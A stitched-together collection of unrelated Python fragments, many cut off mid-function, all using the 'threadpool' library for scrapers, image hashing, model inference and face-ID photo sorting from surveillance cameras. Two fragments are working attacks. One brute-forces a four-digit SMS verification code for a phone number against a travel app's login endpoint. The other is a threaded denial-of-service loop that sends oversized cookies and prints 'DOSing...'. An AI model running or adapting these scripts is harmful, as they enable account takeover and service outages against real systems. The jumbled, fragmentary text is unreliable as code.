def getNameSet(self): reload(sys) sys.setdefaultencoding('utf-8') # sys.setdefaultencoding('gbk') pool = threadpool.ThreadPool(10) # #在IEEE上根据关键字得到搜索页 # for keyword in keywords: # url = '%s%s%s%s' % ('http://ieeexplore.ieee.org/search/searchresult.jsp?', 'queryText=', keyword, rangeYear) # pageUrlQueue.put(url) # requests = threadpool.makeRequests(self.getIeeePages, keywords) # [pool.putRequest(req) for req in requests] # pool.wait() # self.pageWrite('searchPages/ieeePages.txt') # # 在ACM上根据关键字得到搜索页 # for keyword in keywords: # url = '%s%s' % ('http://dl.acm.org/results.cfm?query=', keyword) # pageUrlQueue.put(url) # requests = threadpool.makeRequests(self.getACMPages, keywords) # [pool.putRequest(req) for req in requests] # pool.wait() # self.pageWrite('searchPages/acmPages.txt') # #根据Ieee的搜索页得到全部document的Url # pageUrls = open("searchPages/ieeePages.txt").readlines() # for page in pageUrls: # pageUrlQueue.put(page) # requests = threadpool.makeRequests(self.getIeeeDocuments, pageUrls[0:10]) # [pool.putRequest(req) for req in requests] # pool.wait() # self.docWrite('docUrls/ieeeDocs.txt') # #根据acm的搜索页得到全部document的Url # pageUrls = open("searchPages/acmPages.txt").readlines() # for page in pageUrls: # pageUrlQueue.put(page) # requests = threadpool.makeRequests(self.getACMAuthors, pageUrls[0:10]) # [pool.putRequest(req) for req in requests] # pool.wait() # self.docWrite('docUrls/acmDocs.txt') # #根据acm的搜索页得到全部author的name # pageUrls = open("docUrls/acmDocs.txt").readlines() # for page in pageUrls: # pageUrlQueue.put(page) # requests = threadpool.makeRequests(self.getACMName, pageUrls[0:10]) # [pool.putRequest(req) for req in requests] # pool.wait() # self.acmWrite('names/acmNames.txt') # # 在ACM上根据关键字得到搜索页 # for keyword in keywords: # url = '%s%s%s' % ('https://www.elsevier.com/search-results?query=', keyword, '&labels=all') # pageUrlQueue.put(url) # numbers = range(0, 10) # requests = threadpool.makeRequests(self.getElsDocs, numbers) # [pool.putRequest(req) for req in requests] # pool.wait() # self.pageWrite('searchPages/elsevierPages.txt') #根据Ieee的搜索页得到全部document的Url num = range(0, 10) pageUrls = open("docUrls/ieeeDocs.txt").readlines() for page in pageUrls: pageUrlQueue.put(page) requests = threadpool.makeRequests(self.getIeeeName, num) [pool.putRequest(req) for req in requests] pool.wait()
def judeg_id_list(all_tag_list, cluster_item_tag_abpath_list, result_id_path, cut_pic_name, cluster_id_name, IPC_check, mode, cluster_id_search_range_list): cp_list = [] fun_var = [] for tag in all_tag_list: flag = 0 id_term = "" result_list = my_finds(tag, 0, cluster_item_tag_abpath_list) cluster_id_name_flag = 0 cut_pic_name_flag = 0 ipc_num_flag = 0 for result_item in result_list: if cluster_id_name_flag == 0: if cluster_id_name not in result_item[1]: #判断身份信息是否聚类成功 continue else: id_term = result_item[1].split(path_char)[-1].split(".")[0] if mode == "multi_pic": id_term = result_item[1].split(path_char)[-2] cluster_id_name_flag = 1 #添加时间范围限制 id_search_range_find = my_find(id_term, 0, cluster_id_search_range_list) if id_search_range_find != []: id_search_range = id_search_range_find[1:] if result_item[1] not in id_search_range: continue if mode == "check_pic": if ipc_num_flag == 0: print result_item[1] ipc_num = result_item[1].split(path_char)[-2].split("_")[0] if ipc_num not in IPC_check: continue else: ipc_num_flag = 1 else: if cut_pic_name_flag == 0: if cut_pic_name not in result_item[1]: #判断是否包含其他摄像头信息 continue else: cut_pic_name_flag = 1 if mode == "check_pic": if not os.path.exists(os.path.join(result_id_path, id_term)): print "mkdir", os.path.join(result_id_path, id_term) os.mkdir(os.path.join(result_id_path, id_term)) flag = 1 break else: flag = 1 break if flag == 1: cnt = 0 for result_item in result_list: #添加时间限制 id_search_range_find = my_find(id_term, 0, cluster_id_search_range_list) cnt = cnt + 1 print cnt, "/", len(result_list) if cluster_id_name in result_item[1]: print "check-proc" print result_item[1] print os.path.join(result_id_path, id_term, id_term + ".jpg") json_path = result_item[1].split(".")[0] + ".json" #shutil.copyfile(result_item[1],os.path.join(result_id_path,id_term,id_term + ".jpg")) if mode == "check_pic": cp_list.append([ result_item[1], os.path.join(result_id_path, id_term, id_term + ".jpg") ]) cp_list.append([ json_path, os.path.join(result_id_path, id_term, id_term + ".json") ]) #elif mode == "multi_pic": # for img in os.listdir(result_item[1]): # img_path = os.path.join(result_item[1], img) # cp_list.append([img_path, os.path.join(result_id_path, id_term, img)]) else: print "multi-proc" print result_item[1] if id_search_range_find != []: id_search_range = id_search_range_find[1:] if result_item[1] not in id_search_range: continue for img in os.listdir(result_item[1]): img_path = os.path.join(result_item[1], img) #print img_path #print os.path.join(result_id_path, id_term, img) #shutil.copyfile(img_path,os.path.join(result_id_path, id_term, img)) cp_list.append([ img_path, os.path.join(result_id_path, id_term, img) ]) # for ele in cp_list: # try: # shutil.copyfile(ele[0],ele[1]) # except Exception as e: # print(e) for i in range(0, len(cp_list)): cpfile_A = cp_list[i][0] cpfile_B = cp_list[i][1] fun_var.append(([cpfile_A, cpfile_B, i, len(cp_list) - 1], None)) pool = threadpool.ThreadPool(10) requests = threadpool.makeRequests(cp_exec, fun_var) [pool.putRequest(req) for req in requests] pool.wait()
exception_handler = logging.FileHandler('exception.log') process_handler.setFormatter(formatter) exception_handler.setFormatter(formatter) process_log.addHandler(process_handler) exception_log.addHandler(exception_handler) # 访问图片前缀 prefix = 'http://image.media.lianjia.com' subprefix = '!m_fit,w_300,h_300' # 根据url下载图片 # 保存图像文件名的队列 req_queue = Queue.Queue(256) download_pool = threadpool.ThreadPool(16) # request id global request_id request_id = int(time.time()) q = threading.Lock() # 解析请求中的数据把数据存放到队列中 # Args: # req_data: 请求数据 # Returns: # None def download_and_generate_hash(img_url, result, ret, request_seq): try: # 判断img_url 是否为空
def multi_run(uids, keyword): pool = threadpool.ThreadPool(10) args_list = [{'uid': uid, 'keyword': keyword} for uid in uids] reqs = threadpool.makeRequests(run, args_list) [pool.putRequest(req) for req in reqs] pool.wait()
def get_output2(data): pool = threadpool.ThreadPool(40) requests = threadpool.makeRequests(find_ans2, data) [pool.putRequest(req) for req in requests] pool.wait()
from common.common_test import * """ 参考: 忘了哪个网站了 《Python 核心编程》 目录: 1、使用threadpool 2、threading_demo.py使用的concurrent.future下的ThreadPoolExecutor ... """ # 可以指定1-7执行哪些程序,或者指定为[0]执行全部 exe_list = [0] print('1、使用threadpool') def func(num): print('num:' + repr(num)) if is_exec_curr(exe_list, 1) and __name__ == '__main__': res = list(range(100)) pool = threadpool.ThreadPool(20) # 20个线程 requests = threadpool.makeRequests(func, res) # 生成线程要执行的所有线程,第一个参数为函数名,第二个参数是传的值 for request in requests: pool.putRequest(request) # [pool.putRequest(request) for request in requests] # 与上面的for循环等价 pool.wait() # 等待,其他线程执行结束
flag = 1 except Exception as e: print(userid + "****" + "Error!!! " + e.message + "\n") errorTime += 1 time.sleep(10) if flag == 1: successusers.append(userid) if len(successusers) % 25 == 0: writer = open('D:\users\\v-zhaozl\Weibo\\' + "Success", 'w') for s in successusers: writer.write(s + "\n") writer.close() print(userid + " End") all_the_text = [] file_object = open('D:\users\\v-zhaozl\Weibo\weiboids.txt', 'r') try: all_the_text = file_object.read() finally: file_object.close() userids = [] for text in all_the_text.split("\n"): userids.append(text.split("\t")[1]) pool = threadpool.ThreadPool(10) requests = threadpool.makeRequests(threadFun, userids) [pool.putRequest(req) for req in requests] pool.wait()
shop_name ) > 0 and '共<span id="J_resCount">0</span>件商品' not in response.text: msg = shop_name vender_id = doc("#vender_id").val() if vender_id and len(vender_id) > 0: print(shop_name) else: msg = '空' else: msg = '无' file_info = str(shopId) + "\t" + str(vender_id) + "\t" + msg with open(cross_files, "a+", encoding='utf-8') as w: w.write(file_info) w.write('\n') gc.collect() except IOError: gc.collect() time.sleep(3) run_page(shopId) make_data() del cross_start pool = thread_pool.ThreadPool(15) rt = thread_pool.makeRequests(run_page, shop_list) [pool.putRequest(req) for req in rt] pool.wait() print('Done!')
def md5(s): m = hashlib.md5() m.update(s.encode("utf-8")) return m.hexdigest() gdict = { 'todo_url_list': set(list()), 'all_url_list': set(list()), } all_url_list = set(list()) undonejobs = dict() threadnum = 16 downpool = threadpool.ThreadPool(threadnum / 2) pagepool = threadpool.ThreadPool(threadnum) downlock = threading.Lock() tasknum = 0 def unifyurl(baseurl, href): # 检测相对url if baseurl is not None: baseurl = baseurl.strip() # 去空格 if href is not None: href = href.strip() if baseurl is not None: if href.startswith('//'): href = baseurl.split('//')[0] + href elif href.startswith('/'):
OSTYPE = 'windows' elif 'posix' in os.name: OSTYPE = 'linux' else: Log.info('不识别的系统类型') sys.exit(-1) # 设置代理信息,如果服务器无法连接外网需要设置代理连接 if 'ON' in use_proxy: socks.set_default_proxy(socks.SOCKS5, PROXY_HOST, PROXY_PORT, True, PROXY_USER, PROXY_PAWD) socket.socket = socks.socksocket # 获取开机线程的个数,开启线程池。获取订单对时间和编号进行并行操作 threadNum = inCfg['TOOL']['thread'] pool = threadpool.ThreadPool(int(threadNum)) # 手动执行跟2个参数,卫星明和时间段 if len(args) == 2: Log.info(u'手动运行订购程序 -----------------------------') satID = args[0] # 卫星全名 str_time = args[1] # 程序执行时间范围 # 进行时间的解析,由YYYYMMDD-YYYYMMDD 转为datetime类型的开始时间和结束时间 date_s, date_e = pb_time.arg_str2date(str_time) # 重新根据数据规则定义时间清单 NumDateDict1 = {} NumDateDict2 = {} # 定义参数List,传参给线程池
#coding=utf8 import threadpool import time import urllib2 urls = [ 'http://www.163.com', 'http://www.amazon.com', 'http://www.ebay.com', 'http://www.alibaba.com' ] def myRequest(url): resp = urllib2.urlopen(url) print url, resp.getcode() def timeCost(request, n): print "Elapsed time: %s" % (time.time() - start) start = time.time() pool = threadpool.ThreadPool(4) #ThreadPool(poolsize) 表示最多可以创建poolsize这么多线程 reqs = threadpool.makeRequests( myRequest, urls, timeCost) #makeRequests(some_callable, list_of_args, callback) [pool.putRequest(req) for req in reqs] pool.wait()
import time import threadpool #先用pip install threadpool 检查是否安装 #执行比较耗时的函数,需要开启多线程 def get_html(url): time.sleep(3) print(url) urls = [i for i in range(10)] #生成10个数 for的简洁写法 pool = threadpool.ThreadPool(10) #建立线程池 开启10个线程 requests = threadpool.makeRequests(get_html, urls) #提交10个任务到线程池 for req in requests: #开始执行任务 pool.putRequest(req) #提交 pool.wait() #等待完成
def run(self, ids): pool = threadpool.ThreadPool(12) request = threadpool.makeRequests(self.spider, ids) [pool.putRequest(req) for req in request] pool.wait()
'sumbit': 'getMobileCode' } #submit=getMobileCode&mobile=&v=i6.0.1&vc=AppStore&vd=ae8fbfa52daac979&lang=zh-Hans headers = {'User-Agent': '6.0.1 rv:1537 (iPhone; iPhone OS 7.0.4; zh_CN)'} url = "http://app6.117go.com/demo27/php/loginAction.php?submit=getMobileCode&mobile=%s&v=i6.0.1&vc=AppStore&vd=ae8fbfa52daac979&lang=zh-Hans" % phone try: req = requests.get(url, headers=headers, timeout=3) print req.url req_result = json.loads(req.content)['OK'] except Exception, e: print e sys.exit(1) if int(req_result) == 0: print "code have sent" if __name__ == '__main__': args = [] status = 0 if len(sys.argv) != 2: print "usage: %s phone" % sys.argv[0] sys.exit(1) phone = sys.argv[1] send_code() for i in range(1000, 9999): args.append(i) pool = tp.ThreadPool(5) reqs = tp.makeRequests(checkcode, args) [pool.putRequest(req) for req in reqs] pool.wait()
def get(self): pool = threadpool.ThreadPool(10) requests = threadpool.makeRequests(self._get, self.urls) [pool.putRequest(req) for req in requests] pool.wait()
_WebTmp = _WebTmp[0] _WebTmp = _WebTmp.split('\'') _WebTmp = _WebTmp[len(_WebTmp) - 1] _WebTmp = _WebTmp.split('=') _SessionID = _WebTmp[0] _Session = _WebTmp[1] for i in range(4000): _Session += randomCharacter() _Cookies = {_SessionID: _Session} while True: _Flag += 1 try: _Req = requests.get(_Host, cookies=_Cookies, headers=HEADER) print "[%s] DOSing... " % _Flag print _Req.content except: continue if __name__ == '__main__': args = [] for i in range(THREAD_NUM): args.append(args) pool = tp.ThreadPool(THREAD_NUM) reqs = tp.makeRequests(exploit, args) [pool.putRequest(req) for req in reqs] pool.wait()
def run(args): pool = threadpool.ThreadPool(5) requests = threadpool.makeRequests(parseArticleWithAccount, args) [pool.putRequest(req) for req in requests] pool.wait()
def predict_my(visual=True, model_weight="model_final.pth"): cfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, model_weight) predictor = DefaultPredictor(cfg) cfg.TEST.DETECTIONS_PER_IMAGE = 500 # test_json= "/root/data/rubzz/ruby/ruby_output/test/person/split_test_method2_person.json" # test_image_path="/root/data/rubzz/ruby/ruby_output/test/person/split_test_method2_person" # test_json="/root/data/gvision/dataset/predict/person/test_person.json" # test_image_path="/root/data/gvision/dataset/predict/person/img" test_json = "/root/data/rubzz/ruby/ruby_output/test/person/img_testone/test_person_onetest.json" test_image_path = '/root/data/rubzz/ruby/ruby_output/test/person/img_testone' dataset_test_dicts = json.load(open(test_json, "r")) # MetadataCatalog.get("pandahead").set(thing_classes=["head"], thing_dataset_id_to_contiguous_id={1: 0}) train_dicts_metadata = MetadataCatalog.get("pandahead") print("metadata----------------", train_dicts_metadata) print("predict-------------------start") "thing_classes=['visible body', 'full body', 'head', 'vehicle'], thing_dataset_id_to_contiguous_id={1: 0, 2: 1, 3: 2, 4: 3}" os.makedirs(os.path.join(cfg.OUTPUT_DIR, "my_predict"), exist_ok=True) # for j,(file_name,dict_value) in enumerate(random.sample(dataset_test_dicts.items(),5)): # pbar = tqdm(total=len(dataset_test_dicts), ncols=50) import threadpool func_var = [([file_name, dict_value], None) for file_name, dict_value in dataset_test_dicts.items()] def sayhello(file_name, dict_value): coco_list_results = [] print("{}------------------{}\t{}".format( os.path.join(test_image_path, file_name), model_weight[6:-4], len(dataset_test_dicts.keys())), flush=True) img = cv2.imread(os.path.join(test_image_path, file_name)) pre_output = predictor(img) num_instance = 0 cid = [0, 0, 0, 0] pre_instances = pre_output['instances'] if "instances" in pre_output and len(pre_instances) != 0: coco_list_result, num_instance, cid = instances_to_coco_json( pre_instances.to(torch.device("cpu")), dict_value["image id"]) coco_list_results = coco_list_results + coco_list_result srcfile, paras = file_name.split('___') srcfile = srcfile.replace('_IMG', '/IMG') image_id = srcfile[-2:] scale, left, up = paras.replace('.jpg', '').split('__') if visual and (up == "16480" or up == "12360"): print("visual-------------------------", file_name) cv2.putText( img, f"len:{num_instance} c1:{cid[0]} c2:{cid[1]} c3:{cid[2]} c4:{cid[3]}", (15, 80), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (138, 0, 255), 4) v = Visualizer( img[:, :, ::-1], metadata=train_dicts_metadata, scale=1) # ColorMode.SEGMENTATION or ColorMode.IMAGE_BW) v = v.draw_instance_predictions( pre_instances.to("cpu")) #draw xyxy os.makedirs(os.path.join(cfg.OUTPUT_DIR, "d2_predict_split_visual_17_01"), exist_ok=True) cv2.imwrite( os.path.join( cfg.OUTPUT_DIR, "d2_predict_split_visual_17_01", "visual{}_{}".format(model_weight[6:-4], file_name)), v.get_image()[:, :, ::-1]) # pbar.update(1) # pbar.close() pool = threadpool.ThreadPool(500) requests = threadpool.makeRequests(sayhello, func_var) [pool.putRequest(req) for req in requests] pool.wait() # for file_name,dict_value in dataset_test_dicts.items(): # # print("{}\t{}------------------{}\t{}".format(os.path.join(test_image_path,file_name),j,model_weight[6:-4],len(dataset_test_dicts.keys())),flush=True) # img=cv2.imread(os.path.join(test_image_path,file_name)) # pre_output =predictor(img) # num_instance=0 # cid=[0,0,0,0] # pre_instances=pre_output['instances'] # if "instances" in pre_output and len(pre_instances)!=0: # coco_list_result,num_instance,cid=instances_to_coco_json(pre_instances.to(torch.device("cpu")),dict_value["image id"]) # coco_list_results=coco_list_results+coco_list_result # srcfile, paras = file_name.split('___') # srcfile =srcfile.replace('_IMG', '/IMG') # image_id=srcfile[-2:] # scale, left, up = paras.replace('.jpg', '').split('__') # if visual and (up=="16480" or up=="12360"): # print("visual-------------------------",file_name) # cv2.putText(img, f"len:{num_instance} c1:{cid[0]} c2:{cid[1]} c3:{cid[2]} c4:{cid[3]}", (15,80), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (138,0,255), 4) # v = Visualizer(img[:, :, ::-1],metadata=train_dicts_metadata, scale=1)# ColorMode.SEGMENTATION or ColorMode.IMAGE_BW) # v = v.draw_instance_predictions(pre_instances.to("cpu"))#draw xyxy # os.makedirs(os.path.join(cfg.OUTPUT_DIR,"d2_predict_split_visual_17_01"),exist_ok=True) # cv2.imwrite(os.path.join(cfg.OUTPUT_DIR,"d2_predict_split_visual_17_01","visual{}_{}".format(model_weight[6:-4],file_name)),v.get_image()[:, :, ::-1]) tempc = os.path.join( cfg.OUTPUT_DIR, "my_predict", f"{model_weight[6:-4]}_nms{cfg.MODEL.RETINANET.NMS_THRESH_TEST}_fs{cfg.MODEL.RETINANET.SCORE_THRESH_TEST}_17_01.json" ) print(tempc) f1 = open(tempc, 'w') f1.write(json.dumps(coco_list_results, cls=MyEncoder)) print("predict----------------end")
def __init__(self, maxsize=20, q_size=20, resq_size=200, name=None): #self.workingq = queue.Queue(maxsize) self.tpool = threadpool.ThreadPool(maxsize, q_size=q_size, resq_size=resq_size)
for district in districts: areas_of_district = get_areas(city, district) print('{0}: Area list: {1}'.format(district, areas_of_district)) # 用list的extend方法,L1.extend(L2),该方法将参数L2的全部元素添加到L1的尾部 areas.extend(areas_of_district) # 使用一个字典来存储区县和板块的对应关系, 例如{'beicai': 'pudongxinqu', } for area in areas_of_district: area_dict[area] = district print("Area:", areas) print("District and areas:", area_dict) # 准备线程池用到的参数 nones = [None for i in range(len(areas))] city_list = [city for i in range(len(areas))] args = zip(zip(city_list, areas), nones) # areas = areas[0: 1] # For debugging # 针对每个板块写一个文件,启动一个线程来操作 pool_size = thread_pool_size pool = threadpool.ThreadPool(pool_size) my_requests = threadpool.makeRequests(collect_area_ershou, args) [pool.putRequest(req) for req in my_requests] pool.wait() pool.dismissWorkers(pool_size, do_join=True) # 完成后退出 # 计时结束,统计结果 t2 = time.time() print("Total crawl {0} areas.".format(len(areas))) print("Total cost {0} second to crawl {1} data items.".format( t2 - t1, total_num))
# if comm_num>0:#如果有评论就提交 # id_comm_dict[item_id]=get_comm.delay(inner_url,comm_num) shop_info_data = get_shop_info(inner_url) price = item.select("div.p-price strong i")[0].text book_name = item.select('div.p-name em')[0].text shop_info_data['book_name'] = book_name shop_info_data['price'] = price shop_info_data['comm_num'] = comm_num shop_info_data['item_id'] = item_id print(shop_info_data) write_csv(shop_info_data) if __name__ == '__main__': keyword = input('请输入要搜索的书:') urls = [] for i in range(5, 7, 2): url = 'https://search.jd.com/Search?keyword={}&suggest=1.def.0.V05--38s0&wq={}&page={}&s=101&click=0'.format( keyword, keyword, i) urls.append(([ url, ], None)) pool = threadpool.ThreadPool(3) reque = threadpool.makeRequests(get_index, urls) for c in reque: pool.putRequest(c) pool.wait()
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" } main_url = "https://www.ixdzs.com" def get_conn(): conn = MySQLdb.connect(host='localhost', port=3306, user='******', passwd='', db='jianghuiyan', charset='utf8') return conn task_pool = threadpool.ThreadPool(15) request = requests.session() request.keep_alive = False urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def get_response(url): for i in range(1, 4): try: response = request.get(url, timeout=10, verify=False) return response except BaseException as e: print(e) print("获取" + url + "失败")
def thread_main(item): pool = threadpool.ThreadPool(4) tasks = threadpool.makeRequests(get_detail, item) [pool.putRequest(req) for req in tasks] pool.wait()
labels = df.values m = {} for val in labels: m[val[0]] = val[1] params = [] idx = 0 for root, dirs, filenames in os.walk(cfg.data_neg_path): for each_tif in filenames: if '.tif' in each_tif: name = each_tif.split('.')[0] flag = 'pos' if m[int(name)] == 'Positive' else 'neg' path = os.path.join(root, each_tif) # ./EDCP/data_append/1/1.tif out_patch_path = os.path.join(cfg.patch_data, flag, name) # ./EDCP_PATCH/pos/1/ idx += 1 params.append([path, args.size, args.scale, out_patch_path, args.patch_size, args.nums, args.bin, args.threshold]) # print(idx) cp('(#b)total_img:\t{}(#)'.format(idx)) pool = threadpool.ThreadPool(args.poolsize) requests = threadpool.makeRequests(work, params) [pool.putRequest(req) for req in requests] pool.wait()
def login_parser(username, password): s = requests.Session() s.proxies = constant.PROXY s.verify = False s.headers.update({'Referer': constant.LOGIN_URL}) s.get(constant.LOGIN_URL) content = s.get(constant.LOGIN_URL).content html = BeautifulSoup(content, 'html.parser') csrf_token_elem = html.find('input', attrs={'name': 'csrfmiddlewaretoken'}) if not csrf_token_elem: raise Exception('Cannot find csrf token to login') csrf_token = csrf_token_elem.attrs['value'] login_dict = { 'csrfmiddlewaretoken': csrf_token, 'username_or_email': username, 'password': password, } resp = s.post(constant.LOGIN_URL, data=login_dict) if 'Invalid username/email or password' in resp.text: logger.error('Login failed, please check your username and password') exit(1) html = BeautifulSoup(s.get(constant.FAV_URL).content, 'html.parser') count = html.find('span', attrs={'class': 'count'}) if not count: logger.error("Can't get your number of favorited doujins. Did the login failed?") count = int(count.text.strip('(').strip(')').replace(',', '')) if count == 0: logger.warning('No favorites found') return [] pages = int(count / 25) if pages: pages += 1 if count % (25 * pages) else 0 else: pages = 1 logger.info('You have %d favorites in %d pages.' % (count, pages)) if os.getenv('DEBUG'): pages = 1 ret = [] doujinshi_id = re.compile('data-id="([\d]+)"') def _callback(request, result): ret.append(result) thread_pool = threadpool.ThreadPool(5) for page in range(1, pages + 1): try: logger.info('Getting doujinshi ids of page %d' % page) resp = s.get(constant.FAV_URL + '?page=%d' % page).text ids = doujinshi_id.findall(resp) requests_ = threadpool.makeRequests(doujinshi_parser, ids, _callback) [thread_pool.putRequest(req) for req in requests_] thread_pool.wait() except Exception as e: logger.error('Error: %s, continue', str(e)) return ret
def __init__(self, config_file, _password): """Netconfigit constructor Initializes member variables and reads and parses XML configuration file. Starts local tftp server and creates temporary directory for holding configs. Initializes the device threadpool. :param config_file: XML configuration file path :param _password: decryption password """ # initialize member variables self.device_list = [] # list of device objects defined in the configuration file self.device_count = 0 # the number of devices defined in the configuration file self.success_list = [] # the list of device actions that have succeeded self.failure_list = [] # the list of device actions that have failed self.config = 0 # the minidom XML configuration data structure self.config_devices = 0 # pointer to the device elements in the config minidom structure self.tftp_thread = 0 # thread pool for running the local tftp server self.device_threadpool = 0 # thread pool for running device actions self.password = "" # decryption password self.verbose = 0 # verbose logging flag self.logfile = "./Netconfigit.log" # logfile relative path self.plaintext_passwords = "" # boolean value allows use of plaintext passwords in config xml self.transfer_ip = "" # IP address of the local tftp and/or scp server self.scp_username = "" # username used for scp transfer to the local machine self.scp_password = "" # password used for scp transfer to the local machine self.scp_chown = "" # the group and user to which uploaded files' ownership should be changed self.ssh_port = 22 # port used to ssh to local machine - used by chown self.repo_path = "" # absolute path to the configuration repository self.repo_password = "" # password for accessing the repository self.repository = None # GitPython repository object self.tftp_port = "69" # port used by local tftp server self.tftp_root = "" # root directory used by local tftp server self.using_git = 0 # boolean is set to true if the repository directory is a Git repository self.tempdir = ".netconfigit/" # temporary path for downloading configs self.time_start = datetime.now() # starting time timestamp used for calculating total running-time self.time_stop = None # stopping time timestamp used for calculating total running-time self.time_timestamp = time.time() # starting time timestamp # formatted timestamp self.timestamp = datetime.fromtimestamp(self.time_timestamp).strftime('%Y-%m-%d %H:%M:%S') # create the object used for encrypting/decrypting passwords self.password = aescrypt.AESCrypt(_password) # parse xml configuration file self.config = minidom.parse(config_file) logging.info("\nUsing %s", config_file) # check and load options from XML self.options = self.load_options() # check existence of devices in configuration if self.config.getElementsByTagName('device'): self.config_devices = self.config.getElementsByTagName('device') else: print "\nNo devices specified - quitting" exit(1) # load devices from XML configuration into device_list load_err = self.load_devices_xml() if load_err != "0": print load_err print "Configuration errors detected - quitting" exit(1) # create temporary directory for receiving configs self.tempdir = os.path.dirname(self.tftp_root + self.tempdir) try: os.stat(self.tempdir) except os.error: os.mkdir(self.tempdir) logger.info("Creating temporary directory " + self.tempdir) # initialize the thread used for the local tftp server and start the server self.tftp_thread = threadpool.ThreadPool(1) self.tftp_thread.add_task(self.tftp_server) # initialize the thread pool used by device actions logger.info("Creating %s device threads", 20) self.device_threadpool = threadpool.ThreadPool(20)
def get_clean_result(id_relation_path, id_score_clean_path, id_clean_result): cp_list = [] fun_var = [] #获取鲜活监控照文件 id_path_list, id_path_pic_list = get_live_pic_path_list(id_relation_path) #获取清洗打分路径 id_cluster_clean_path = id_score_clean_path.replace( "id_score.txt", "id_cluster.txt") print id_cluster_clean_path id_cluster_clean_handle = open(id_cluster_clean_path, "r") lines = id_cluster_clean_handle.readlines() id_cluster_clean_handle.close() #定义聚类信息列表,待查询 cluster_info = [] cnt = 0 for line in lines: cnt = cnt + 1 print "get_clean_cluster_info:", cnt, "/", len(lines) line = line.strip("\n") tag = line.split("@")[-1] id_path_pic = line.split("@")[0] id_path = id_path_pic.split("#")[0] if [id_path_pic, tag, id_path] not in cluster_info: cluster_info.append([id_path_pic, tag, id_path]) cnt = 0 for id_path_pic in id_path_pic_list: cnt = cnt + 1 print "get_clean:", cnt, "/", len(id_path_pic_list) #找到鲜活监控照对应的tag live_cluster_info_find = my_find(id_path_pic, 0, cluster_info) if live_cluster_info_find == []: continue live_cluster_info_tag = live_cluster_info_find[1] #获取对应的身份信息 live_cluster_info_id_path = live_cluster_info_find[0].split("#")[0] #查询相同id的list live_cluster_info_finds = my_finds(live_cluster_info_id_path, 2, cluster_info) if live_cluster_info_finds == []: continue for live_cluster_info in live_cluster_info_finds: img_path = path_char.join(live_cluster_info[0].split("#")) img_name = live_cluster_info[0].split("#")[-1] tag_check = live_cluster_info[1] if tag_check != live_cluster_info_tag: id_name = live_cluster_info_id_path.split(path_char)[-1] if not os.path.exists(os.path.join(id_clean_result, id_name)): print "mkdir", os.path.join(id_clean_result, id_name) os.mkdir(os.path.join(id_clean_result, id_name)) cp_list.append([ img_path, os.path.join(id_clean_result, id_name, img_name) ]) for i in range(0, len(cp_list)): cpfile_A = cp_list[i][0] cpfile_B = cp_list[i][1] fun_var.append(([cpfile_A, cpfile_B, i, len(cp_list) - 1], None)) pool = threadpool.ThreadPool(10) requests = threadpool.makeRequests(cp_exec, fun_var) [pool.putRequest(req) for req in requests] pool.wait()
def main(): l = ['11111','22222','33333','44444','55555'] pool = threadpool.ThreadPool(5)# 创建一个线程池 requests = threadpool.makeRequests(loop1, l) #传入函数 及函数需要的参数 [pool.putRequest(req) for req in requests]# 不理角这段代码,猜测是循环创建线程 分配任务。 pool.wait()#设置池内所有线程等待。
import time import random import threadpool def get_hash(path): file = open(path, 'rb').read() md5 = hashlib.md5(file).hexdigest() print(path, md5) def get_queue(path): dui_lie = [] file_stream = os.walk(path, True) for dirs in file_stream: prepath = dirs[0] for k in dirs[2]: if '.JPG' in k: filename = k p = prepath + '/' + filename dui_lie.append(p) return dui_lie if __name__ == '__main__': duilie = get_queue('/Volumes/qifei/照片汇总') pool2 = threadpool.ThreadPool(100) for n in threadpool.makeRequests(get_hash, duilie): pool2.putRequest(n) pool2.wait()
for attr in attrs: # if attr in notdealed: # source_url.append(source_addr + attr) # dire_url.append(dire_addr + attr)#attr[0: attr.index('.')] + r"_ID.txt") source_url = [] source_url.append(source_addr + attr) source_url.append(dire_addr + attr) #attr[0: attr.index('.')] + r"_ID.txt") # print(source_url) # func.append((source_url,None)) func.append(source_url) # print(func) # exit() """多线程编程""" pool = tp.ThreadPool(len(attrs)) requests = tp.makeRequests(job, func) [pool.putRequest(req) for req in requests] pool.wait() # print(source_url[0],dire_url[0]) # exit() # job(source_url[0],dire_url[0]) # print(source_url) # exit() # p1 = mp.Process(target=job,args=(source_url,dire_url,),name='p1') # p1.start() # p1.join() # # print(source_url) # # print(dire_url) # # exit()